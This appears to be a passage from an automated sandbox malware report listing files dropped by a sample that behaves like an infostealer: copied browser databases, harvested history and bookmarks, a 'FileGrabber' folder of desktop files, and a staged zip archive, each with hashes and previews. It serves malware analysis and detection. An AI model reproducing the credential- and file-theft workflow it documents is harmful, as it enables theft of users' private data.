Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, Publi

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1675.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp294C.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3C90.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4DF1.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7691.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA393.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA394.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBACF.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBFF4.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC004.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF523.tmp.dat

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\928100\@[United States].zip (copy)

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	719613
Entropy (8bit):	7.984677797478941
Encrypted:	false
SSDEEP:	12288:MCk7hnaG3Tgktd92MsYcmgCRmsR3Wjh3M3J/c7bdRDYu0uswcs91YqJsoUvGajJK:MCk9nTdV8sRlR3Wjh/7DDcszJmoaGajw
MD5:	DF10E4D2831362B6E80EC7000EFA7F70
SHA1:	A234DF821EF7647824C053076434998AA305A081
SHA-256:	4FF760D96FDDA1D1F4EBDB2A745A6116BBC37A33B17133099E0E9738807B3C60
SHA-512:	ABFD6E03B6EE3B197FCF0ABC529AC676A47ABBCE6E80967BC879691A419A668367A124A7D37BD84983BE74AF0ED77469D509148ACAA1DD3B48645826217334CF
Malicious:	false
Preview:	PK..-........X~.- ..........8.Information.txt............F......... .........D..]+...D..]+...D..]+.........d......D.h9.h....2T.#...&..>.=...A."J.k.L.5.....?[R..>........U{...j.P.M..(..4....Vz........R1.8duVk.?0.E..GD.Yb..k...n.n.L.g.....+..TU.......n._H...c.....:.+".d.\.....PHrkv.T~.......<..q.....\2.....i.F.+..UM....1G..[J..-#:.YB.a.?...B.F....c\|..!q........4...h.u.Mi..a...n.O.C`..HV.!.jV.Wuyh.U\.n.X.cPK..-........X`.S<..........8.InstalledSoftware.txt...................... ..........HvY+....HvY+....HvY+...6.V...d...@.<....:.R.4...h..&h..5.w..~...x....Z..1......n...H.4.H.A.O....9...S.P."..2.K.e..t.:......./F..+.x.?.n>0G.t..$..T..[.vZ.G..1..n.P_]....3.5q\|.....:-.;X....!d...Q.:..PK..-........X55............8.Process.txt....]C................ ...........\+.....\+.....Z+...6.V...d...`..M-z.l..J......fQ..4h.v..W...J... 0.I.M...&.Q...2..[...s}..!.f..".f..4..n"...6.P.&.....F..+._........Y[.K...T....x..1..m._l....n....H]...-;.[&.",.5L....h.......n....W

C:\Users\user\AppData\Roaming\928100\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Roaming\928100\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Roaming\928100\Browsers\Google\History.txt

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1393
Entropy (8bit):	5.241470443395582
Encrypted:	false
SSDEEP:	24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
MD5:	7F24357FFA354F2471DED45552B897D7
SHA1:	1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
SHA-256:	573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
SHA-512:	202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
Malicious:	false
Preview:	### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

C:\Users\user\AppData\Roaming\928100\Browsers\Outlook\Outlook.txt

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\928100\DotNetZip-scqqjqvm.tmp

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	719613
Entropy (8bit):	7.984677797478941
Encrypted:	false
SSDEEP:	12288:MCk7hnaG3Tgktd92MsYcmgCRmsR3Wjh3M3J/c7bdRDYu0uswcs91YqJsoUvGajJK:MCk9nTdV8sRlR3Wjh/7DDcszJmoaGajw
MD5:	DF10E4D2831362B6E80EC7000EFA7F70
SHA1:	A234DF821EF7647824C053076434998AA305A081
SHA-256:	4FF760D96FDDA1D1F4EBDB2A745A6116BBC37A33B17133099E0E9738807B3C60
SHA-512:	ABFD6E03B6EE3B197FCF0ABC529AC676A47ABBCE6E80967BC879691A419A668367A124A7D37BD84983BE74AF0ED77469D509148ACAA1DD3B48645826217334CF
Malicious:	false
Preview:	PK..-........X~.- ..........8.Information.txt............F......... .........D..]+...D..]+...D..]+.........d......D.h9.h....2T.#...&..>.=...A."J.k.L.5.....?[R..>........U{...j.P.M..(..4....Vz........R1.8duVk.?0.E..GD.Yb..k...n.n.L.g.....+..TU.......n._H...c.....:.+".d.\.....PHrkv.T~.......<..q.....\2.....i.F.+..UM....1G..[J..-#:.YB.a.?...B.F....c\|..!q........4...h.u.Mi..a...n.O.C`..HV.!.jV.Wuyh.U\.n.X.cPK..-........X`.S<..........8.InstalledSoftware.txt...................... ..........HvY+....HvY+....HvY+...6.V...d...@.<....:.R.4...h..&h..5.w..~...x....Z..1......n...H.4.H.A.O....9...S.P."..2.K.e..t.:......./F..+.x.?.n>0G.t..$..T..[.vZ.G..1..n.P_]....3.5q\|.....:-.;X....!d...Q.:..PK..-........X55............8.Process.txt....]C................ ...........\+.....\+.....Z+...6.V...d...`..M-z.l..J......fQ..4h.v..W...J... 0.I.M...&.Q...2..[...s}..!.f..".f..4..n"...6.P.&.....F..+._........Y[.K...T....x..1..m._l....n....H]...-;.[&.",.5L....h.......n....W

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	true
